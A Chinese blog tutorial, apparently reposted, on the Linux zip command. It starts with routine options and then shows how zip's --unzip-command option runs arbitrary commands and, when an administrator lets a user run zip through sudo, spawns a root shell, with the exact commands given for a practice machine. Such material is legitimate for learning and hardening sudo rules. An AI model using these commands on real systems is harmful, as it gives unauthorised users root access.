赞
踩
Zip是一个简单的基于平台的文件打包和压缩实用程序,适用于类Unix系统,如Linux,Windows等。通过压缩文件和目录它可以帮助我们打包许多分发文件,归档文件和磁盘存储。
我们运行zip -h命令,查看帮助
zip -h
使用 -d 选项删除:
生成zip文件后,可以使用-d选项从存档中删除该文件;
zip -d file.zip file1.txt
使用 -u 选项更新:
要更新zip文件并将文本文件直接添加到zip文件中,我们可以使用到-u选项;
zip -u file.zip file1.txt
使用 -m 选项移动多个文件:
如果要在zip文件中移动一些不同扩展名的文件,可以使用-m选项。通过执行以下命令来移动zip文件中的所有文本文件。
zip -m 1.zip *.txt
可以通过ls -la命令检查所有文本文件是否已被移动到zip文件中;
使用 zip 执行系统命令:
其实我们可以使用zip文件来运行任何的Linux命令。首先,使用touch命令创建一个名为1.txt的文本文件。然后我们尝试通过zip命令执行Linux命令:
zip 1.zip 1.txt -T --unzip-command=“sh -c ifconfig”
可以看到,成功通过zip命令执行了系统命令!!!
当以更高权限运行时,zip的行为将会发生改变。
假设系统管理员已授予本地用户sudo运行zip的权限。
一旦系统被侵入则很有可能导致提权。测试用户就能以sudo用户身份以root权限来运行zip命令!!!
靶机复现:
首先,使用touch命令创建一个文件1.txt,然后通过zip文件压缩文件,并执行一个获取shell的命令。
sudo zip 1.zip 1.txt -T --unzip-command=“sh -c /bin/bash”
利用zip命令来进行提权
输入命令:
touch /tmp/tiquan
在/tmp目录下创建一个为tiquan名字的空文件;
输入命令:
sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command=“sh -c /bin/bash”
可以看到用户以root用户身份运行tar和zip命令:
可以看到,成功通过zip命令获取到受害者机器的shell!!!
参考博客:
https://www.freebuf.com/articles/system/206007.html
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。